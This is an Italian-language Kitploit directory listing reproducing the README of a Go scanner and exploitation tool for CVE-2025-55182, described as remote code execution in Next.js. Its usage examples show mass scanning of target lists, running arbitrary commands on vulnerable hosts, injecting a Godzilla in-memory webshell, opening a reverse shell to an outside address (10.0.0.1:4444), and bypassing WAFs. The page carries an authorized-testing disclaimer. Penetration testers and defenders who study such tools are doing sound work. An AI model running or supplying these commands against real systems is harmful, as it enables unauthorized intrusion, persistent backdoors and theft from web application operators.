Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-POC — Scanner e strumento di sfruttamento basato su Go per CVE-2025-55182 (RCE in Next.js). Supporta scansione batch, esecuzione di comandi, iniezione di shell in memoria Godzilla, reverse shell e bypass WAF. | Kitploit
Strumenti/GitHubGitHub/luoqichen/cve-2025-55182-poc
Scanner di VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebBypass WAFPenetration TestingCommand and ControlSviluppo Payload
GitHubluoqichen/cve-2025-55182-poc

CVE-2025-55182-POC

Scanner e strumento di sfruttamento basato su Go per CVE-2025-55182 (RCE in Next.js). Supporta scansione batch, esecuzione di comandi, iniezione di shell in memoria Godzilla, reverse shell e bypass WAF.

5 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

CVE-2025-55182 Next.js RCE Scanner

License

CVE-2025-55182 strumento di scansione e sfruttamento delle vulnerabilità per l'esecuzione remota di codice nelle applicazioni Next.js. Supporta scansione batch, esecuzione di comandi, iniezione di memory shell Godzilla e funzionalità di reverse shell.

⚠️ Questo strumento è destinato esclusivamente a scopi di ricerca sulla sicurezza e test autorizzati. Non utilizzarlo per scopi illegali.

Caratteristiche

  • Scansione multi-target: supporta singolo URL, elenco di file (un URL per riga) e cartelle contenenti più file .txt.
  • Concorrenza multi-thread: numero di thread personalizzabile per aumentare l'efficienza della scansione.
  • Verifica della vulnerabilità: verifica l'esistenza della vulnerabilità calcolando il prodotto di numeri casuali.
  • Esecuzione di comandi: esegue comandi di sistema arbitrari sul target vulnerabile (supporta Linux e Windows).
  • Iniezione di memory shell Godzilla: genera con un clic le informazioni di connessione per la memory shell Godzilla.
  • Reverse shell: supporta la funzionalità di reverse shell.
  • Salvataggio dei risultati: salva automaticamente gli URL sfruttati con successo e i dettagli in success.json e opzionalmente esporta gli URL vulnerabili in un file specificato.
  • Supporto proxy: proxy HTTP configurabile per l'integrazione con strumenti come Burp Suite.
  • Visualizzazione dell'avanzamento: mostra in tempo reale l'avanzamento della scansione, il tempo trascorso, il tempo rimanente stimato, ecc.

[]

Installazione

Prerequisiti

  • Go 1.16 o superiore
  • Git

Clona il repository

root@kitploit:~
git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
cd cve-2025-55182-POC

Compila

root@kitploit:~
go build -o cve-2025-55182 main.go

Esegui

root@kitploit:~
./cve-2025-55182 -h

Utilizzo

Descrizione dei parametri

Esempi

Scansione singolo target

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000

Scansione batch di target da file

root@kitploit:~
./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt

Esecuzione di comandi

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -c "whoami"

Utilizzo della memory shell Godzilla

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -g

Dopo l'iniezione riuscita, lo strumento mostrerà l'URL di connessione, la password, la chiave e le informazioni dell'intestazione per Godzilla.

Reverse shell

root@kitploit:~
./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444

Abilitazione del proxy

root@kitploit:~
./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10

Descrizione dell'output

  • success.json: salva automaticamente i dettagli di tutti i target sfruttati con successo (inclusi output dei comandi, configurazione Godzilla, ecc.).
  • File specificato da -o: salva l'elenco degli URL vulnerabili (uno per riga).

Durante la scansione vengono visualizzati in tempo reale una barra di avanzamento e le vulnerabilità rilevate, con statistiche finali.

Note importanti

  1. Assicurati di avere l'autorizzazione: scansionare o attaccare sistemi altrui senza autorizzazione è illegale.
  2. Utilizzo del proxy: se devi visualizzare il traffico tramite Burp Suite, usa il parametro -p per impostare il proxy.
  3. Connessione Godzilla: dopo aver iniettato Godzilla con successo, connettiti usando il client Godzilla. Nota che sia la password che la chiave sono generate casualmente.
  4. Impostazione del timeout: per target con rete scarsa, puoi aumentare opportunamente il valore del parametro -to.

Dichiarazione di esclusione di responsabilità

Questo strumento è destinato esclusivamente a scopi di ricerca sulla sicurezza e test autorizzati. L'utente si assume ogni responsabilità legale. Gli sviluppatori non sono responsabili per eventuali usi impropri.

License

MIT

Scarica lo strumento
ParametroTipoDefaultDescrizione
-ustringNessunoSingolo URL target (es. http://example.com:3000)
-fstringNessunoFile contenente un elenco di URL (uno per riga)
-dstringNessunoCartella contenente più file .txt
-ostringNessunoFile di output (salva URL vulnerabili, uno per riga)
-tint10Numero di thread concorrenti
-toint10Timeout della richiesta (secondi)
-cstringNessunoComando da eseguire (es. id)
-mstringNessunoModalità: waf (abilita bypass WAF)
-pstringNessunoProxy HTTP (es. http://127.0.0.1:8080)
-gboolfalseAbilita iniezione memory shell Godzilla
-rsstringNessunoIndirizzo reverse shell (formato IP:PORT)
-dvboolfalseModalità dettagliata (stampa il processo di scansione per ogni URL)
-esboolfalseModalità scansione informazioni sensibili